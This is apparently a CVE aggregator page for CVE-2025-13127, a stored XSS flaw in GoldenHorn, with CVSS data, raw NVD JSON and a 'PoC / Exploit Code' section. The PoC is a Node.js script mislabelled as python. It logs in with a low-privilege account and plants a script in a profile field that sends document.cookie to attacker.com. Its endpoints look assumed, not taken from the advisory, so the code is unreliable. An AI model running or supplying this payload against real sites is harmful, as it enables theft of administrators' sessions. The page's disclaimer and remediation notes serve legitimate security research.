Security Vulnerability Report
中文
CVE-2025-13127 CVSS 3.5 LOW

CVE-2025-13127

Published: 2025-12-10 14:16:19
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TAC Information Services Internal and External Trade Inc. GoldenHorn allows Cross-Site Scripting (XSS).This issue affects GoldenHorn: before 4.25.1121.1.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GoldenHorn < 4.25.1121.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13127 PoC - Stored XSS in GoldenHorn --> <!-- Replace TARGET_URL with the actual GoldenHorn application URL --> const axios = require('axios'); const TARGET_URL = 'http://target-goldenhorn.com'; const ATTACKER_TOKEN = 'attacker_session_token'; // XSS Payload - Steals session cookies const xssPayload = `<script> fetch('https://attacker.com/steal?c=' + document.cookie); </script>`; async function exploit() { console.log('[*] CVE-2025-13127 - GoldenHorn Stored XSS Exploit'); // Step 1: Login with low-privilege account const loginResponse = await axios.post(`${TARGET_URL}/api/auth/login`, { username: 'attacker', password: 'password123' }); const sessionToken = loginResponse.data.token; console.log('[+] Logged in with low-privilege account'); // Step 2: Inject XSS payload into vulnerable field // Common vulnerable fields: username, display name, description, comments const injectResponse = await axios.post( `${TARGET_URL}/api/user/profile`, { displayName: xssPayload, email: '[email protected]' }, { headers: { 'Authorization': `Bearer ${sessionToken}` } } ); console.log('[+] XSS payload injected successfully'); console.log('[+] When admin views the profile, cookie will be stolen'); // Step 3: Social engineering to lure admin console.log('[*] Waiting for admin to visit the page...'); } exploit().catch(console.error); /* Remediation: 1. Upgrade to GoldenHorn version 4.25.1121.1 or later 2. Implement input validation and output encoding 3. Use Content-Security-Policy headers 4. Sanitize all user inputs before storage */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13127", "sourceIdentifier": "[email protected]", "published": "2025-12-10T14:16:19.107", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TAC Information Services Internal and External Trade Inc. GoldenHorn allows Cross-Site Scripting (XSS).This issue affects GoldenHorn: before 4.25.1121.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0441", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.